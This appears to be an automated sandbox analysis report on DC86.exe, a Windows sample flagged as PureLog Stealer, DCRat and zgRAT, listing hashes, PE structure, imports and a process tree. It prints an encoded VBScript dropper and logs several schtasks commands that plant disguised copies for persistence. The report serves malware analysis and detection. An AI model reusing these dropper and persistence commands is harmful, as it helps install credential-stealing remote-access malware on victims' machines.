Preview:	#@~^tAAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE@#@&.U^DbwO UV+n2vFq!ZT@#@&U+DP.ktU4+^V~',Z.nmY+}8L.mYvE.?1DbwORj4.VsJ*@#@&q/4j4+Vs "EUPr/=z4Hw.Dq.YK$DK3nDJz{tj994]Sq3Zc8CYr~,!SPWC^/npTgAAA==^#~@.

\Device\Null

Download File

Process:	C:\Windows\System32\w32tm.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	151
Entropy (8bit):	4.789320938113328
Encrypted:	false
SSDEEP:	3:VLV993J+miJWEoJ8FXaTX9QuDsLMGRlJGKNvoD2Rvj:Vx993DEURRBpGR0aN
MD5:	340692B3A9D067ED21CBC515ACB74B2C
SHA1:	C11CAA3118B30B8A41E3B376CE2ED47E342750F7
SHA-256:	6EA5EEF9C6FAE9E21EC04BAC06F708027E82134A2F7EC45187EB3B5A2BFCFB77
SHA-512:	6FDB76C92BC46401026F5D66D4C047EA3D07A85D369529D99786191CC7D487CDF7E2712F2D2B3F6961A2EA63DEF6882EA05BEF7BBFEE256557952EBEE43B3FF6
Malicious:	false
Preview:	Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 11/01/2025 11:41:36..11:41:36, error: 0x80072746.11:41:41, error: 0x80072746.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.506428399364742
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	DC86.exe
File size:	2'345'705 bytes
MD5:	50ee114bba99ce3a7ba3e64c0080a644
SHA1:	3c9f1189b07b612888a1124714d1586408c78ba0
SHA256:	e7fb15dc103eca61803e214b533fb4dd3fa3d4b171886f452eb6ab8353ee2aa6
SHA512:	58b94a8596d4a94b28da6f0051d90bf098d9def8a112d9541eca814c7b46f5bae619a331831c060eff04f39b62cac1a2ad2a5fe380c75f59aa79322e09a4b64d
SSDEEP:	49152:IBJaWLMtwyMxRizAwgueOJNN3lRHiKLWDWUs:yALwyMb9ue0NTH2Ps
TLSH:	A4B5BF0A1A914A37C2741B314876403E63B5DB363E62EF4B371F2496A9037B5CA736B7
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.

File Icon


Icon Hash:	1515d4d4442f2d2d

Static PE Info

General

Entrypoint:	0x41f530
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	12e12319f1029ec4f8fcbed7e82df162

Entrypoint Preview

Instruction
call 00007F2AA8C4267Bh
jmp 00007F2AA8C41F8Dh
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007F2AA8C34DD7h
mov dword ptr [esi], 004356D0h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 004356D8h
mov dword ptr [ecx], 004356D0h
ret
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 004356B8h
push eax
call 00007F2AA8C4541Fh
test byte ptr [ebp+08h], 00000001h
pop ecx
je 00007F2AA8C4211Ch
push 0000000Ch
push esi
call 00007F2AA8C416D9h
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007F2AA8C34D52h
push 0043BEF0h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007F2AA8C44ED9h
int3
push ebp
mov ebp, esp
sub esp, 0Ch
lea ecx, dword ptr [ebp-0Ch]
call 00007F2AA8C42098h
push 0043C0F4h
lea eax, dword ptr [ebp-0Ch]
push eax
call 00007F2AA8C44EBCh
int3
jmp 00007F2AA8C46957h
int3
int3
int3
int3
push 00422900h
push dword ptr fs:[00000000h]

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x3d070	0x34	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3d0a4	0x50	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x64000	0xdff8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x72000	0x233c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x3b11c	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x355f8	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x33000	0x278	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x3c5ec	0x120	.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x31bdc	0x31c00	2831bb8b11e3209658a53131886cdf98	False	0.5909380888819096	data	6.712962136932442	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x33000	0xaec0	0xb000	042f11346230ca5aa360727d9908e809	False	0.4579190340909091	data	5.261605615899847	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3e000	0x24720	0x1000	9670b581969e508258d8bc903025de5e	False	0.451416015625	data	4.387459135575936	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didat	0x63000	0x190	0x200	c83554035c63bb446c6208d0c8fa0256	False	0.4453125	data	3.3327310103022305	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x64000	0xdff8	0xe000	ba08fbcd0ed7d9e6a268d75148d9914b	False	0.6373639787946429	data	6.638661032196024	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x72000	0x233c	0x2400	40b5e17755fd6fdd34de06e5cdb7f711	False	0.7749565972222222	data	6.623012966548067	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
PNG	0x64650	0xb45	PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced	English	United States	1.0027729636048528
PNG	0x65198	0x15a9	PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced	English	United States	0.9363390441839495
RT_ICON	0x66748	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors	English	United States	0.47832369942196534
RT_ICON	0x66cb0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors	English	United States	0.5410649819494585
RT_ICON	0x67558	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors	English	United States	0.4933368869936034
RT_ICON	0x68400	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m	English	United States	0.5390070921985816
RT_ICON	0x68868	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m	English	United States	0.41393058161350843
RT_ICON	0x69910	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m	English	United States	0.3479253112033195
RT_ICON	0x6beb8	0x3d71	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.9809269502193401
RT_DIALOG	0x70588	0x286	data	English	United States	0.5092879256965944
RT_DIALOG	0x70358	0x13a	data	English	United States	0.60828025477707
RT_DIALOG	0x70498	0xec	data	English	United States	0.6991525423728814
RT_DIALOG	0x70228	0x12e	data	English	United States	0.5927152317880795
RT_DIALOG	0x6fef0	0x338	data	English	United States	0.45145631067961167
RT_DIALOG	0x6fc98	0x252	data	English	United States	0.5757575757575758
RT_STRING	0x70f68	0x1e2	data	English	United States	0.3900414937759336
RT_STRING	0x71150	0x1cc	data	English	United States	0.4282608695652174
RT_STRING	0x71320	0x1b8	data	English	United States	0.45681818181818185
RT_STRING	0x714d8	0x146	data	English	United States	0.5153374233128835
RT_STRING	0x71620	0x46c	data	English	United States	0.3454063604240283
RT_STRING	0x71a90	0x166	data	English	United States	0.49162011173184356
RT_STRING	0x71bf8	0x152	data	English	United States	0.5059171597633136
RT_STRING	0x71d50	0x10a	data	English	United States	0.49624060150375937
RT_STRING	0x71e60	0xbc	data	English	United States	0.6329787234042553
RT_STRING	0x71f20	0xd6	data	English	United States	0.5747663551401869
RT_GROUP_ICON	0x6fc30	0x68	data	English	United States	0.7019230769230769
RT_MANIFEST	0x70810	0x753	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.3957333333333333

Imports

DLL	Import
KERNEL32.dll	GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
OLEAUT32.dll	SysAllocString, SysFreeString, VariantClear
gdiplus.dll	GdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Target ID:	0
Start time:	10:22:56
Start date:	11/01/2025
Path:	C:\Users\user\Desktop\DC86.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\DC86.exe"
Imagebase:	0x9e0000
File size:	2'345'705 bytes
MD5 hash:	50EE114BBA99CE3A7BA3E64C0080A644
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.2110245096.00000000074E7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000003.2109455110.0000000006BDC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	10:22:56
Start date:	11/01/2025
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\hyperIntoBroker\vN1MMUTrCtC1FtSWQe4vLUvQugg9bTGuni3V.vbe"
Imagebase:	0x530000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	10:23:08
Start date:	11/01/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\hyperIntoBroker\7ZVJJhRLWkC.bat" "
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	10:23:08
Start date:	11/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	10:23:09
Start date:	11/01/2025
Path:	C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe
Wow64 process (32bit):	false
Commandline:	"C:\hyperIntoBroker/hyperProviderbrokermonitorNet.exe"
Imagebase:	0x410000
File size:	2'023'936 bytes
MD5 hash:	54EFF01605DA5E7CBDB382C98ECE2C2A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000005.00000000.2240119173.0000000000412000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000005.00000002.2319266485.00000000129EC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\hyperIntoBroker\hyperProviderbrokermonitorNet.exe, Author: Joe Security
Antivirus matches:	Detection: 83%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	10:23:13
Start date:	11/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\WmiPrvSE.exe'" /rl HIGHEST /f
Imagebase:	0x7ff6181a0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	10:23:13
Start date:	11/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\mozilla maintenance service\logs\WmiPrvSE.exe'" /rl HIGHEST /f
Imagebase:	0x7ff6181a0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	10:23:13
Start date:	11/01/2025
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gvn4blmg\gvn4blmg.cmdline"
Imagebase:	0x7ff6b1e40000
File size:	2'759'232 bytes
MD5 hash:	F65B029562077B648A6A5F6A1AA76A66
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	10:23:13
Start date:	11/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	10:23:13
Start date:	11/01/2025
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3377.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC54DAB3F1F89841D48E3F80BA35A395CE.TMP"
Imagebase:	0x7ff7712b0000
File size:	52'744 bytes
MD5 hash:	C877CBB966EA5939AA2A17B6A5160950
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	10:23:14
Start date:	11/01/2025
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\obippivd\obippivd.cmdline"
Imagebase:	0x7ff6b1e40000
File size:	2'759'232 bytes
MD5 hash:	F65B029562077B648A6A5F6A1AA76A66
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	10:23:14
Start date:	11/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	10:23:14
Start date:	11/01/2025
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES355B.tmp" "c:\Windows\System32\CSCBF0D9C89CA2D49349EF95B69138A8B32.TMP"
Imagebase:	0x7ff7712b0000
File size:	52'744 bytes
MD5 hash:	C877CBB966EA5939AA2A17B6A5160950
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	10:23:14
Start date:	11/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "PuhmblZdAcSNmlRDfzjrgWP" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\microsoft office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe'" /f
Imagebase:	0x7ff6181a0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	10:23:14
Start date:	11/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "PuhmblZdAcSNmlRDfzjrgW" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe'" /rl HIGHEST /f
Imagebase:	0x7ff6181a0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	10:23:14
Start date:	11/01/2025
Path:	C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\microsoft office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe"
Imagebase:	0xd50000
File size:	2'023'936 bytes
MD5 hash:	54EFF01605DA5E7CBDB382C98ECE2C2A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Microsoft Office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Avira Detection: 100%, Avira Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 100%, Joe Sandbox ML Detection: 100%, Joe Sandbox ML Detection: 100%, Joe Sandbox ML Detection: 83%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	10:23:14
Start date:	11/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "PuhmblZdAcSNmlRDfzjrgWP" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\microsoft office\Office16\PuhmblZdAcSNmlRDfzjrgW.exe'" /rl HIGHEST /f
Imagebase:	0x7ff6181a0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	10:23:14
Start date:	11/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "PuhmblZdAcSNmlRDfzjrgWP" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\windows defender\en-GB\PuhmblZdAcSNmlRDfzjrgW.exe'" /f
Imagebase:	0x7ff6181a0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	10:23:14
Start date:	11/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "PuhmblZdAcSNmlRDfzjrgW" /sc ONLOGON /tr "'C:\Program Files (x86)\windows defender\en-GB\PuhmblZdAcSNmlRDfzjrgW.exe'" /rl HIGHEST /f
Imagebase:	0x7ff6181a0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	10:23:14
Start date:	11/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "PuhmblZdAcSNmlRDfzjrgWP" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\windows defender\en-GB\PuhmblZdAcSNmlRDfzjrgW.exe'" /rl HIGHEST /f
Imagebase:	0x7ff6181a0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	10:23:14
Start date:	11/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "PuhmblZdAcSNmlRDfzjrgWP" /sc MINUTE /mo 10 /tr "'C:\Recovery\PuhmblZdAcSNmlRDfzjrgW.exe'" /f
Imagebase:	0x7ff6181a0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	10:23:15
Start date:	11/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "PuhmblZdAcSNmlRDfzjrgW" /sc ONLOGON /tr "'C:\Recovery\PuhmblZdAcSNmlRDfzjrgW.exe'" /rl HIGHEST /f
Imagebase:	0x7ff6181a0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	10:23:15
Start date:	11/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "PuhmblZdAcSNmlRDfzjrgWP" /sc MINUTE /mo 14 /tr "'C:\Recovery\PuhmblZdAcSNmlRDfzjrgW.exe'" /rl HIGHEST /f
Imagebase:	0x7ff6181a0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	10:23:15
Start date:	11/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
Commandline:	schtasks.exe /create /tn "PuhmblZdAcSNmlRDfzjrgWP" /sc MINUTE /mo 7 /tr "'C:\Users\user\PuhmblZdAcSNmlRDfzjrgW.exe'" /f
Imagebase:	0x7ff6181a0000
File size:	235'008 bytes
MD5 hash:	76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	10:23:15
Start date:	11/01/2025
Path:	C:\Windows\System32\schtasks.exe
Wow64 process (32bit):	false
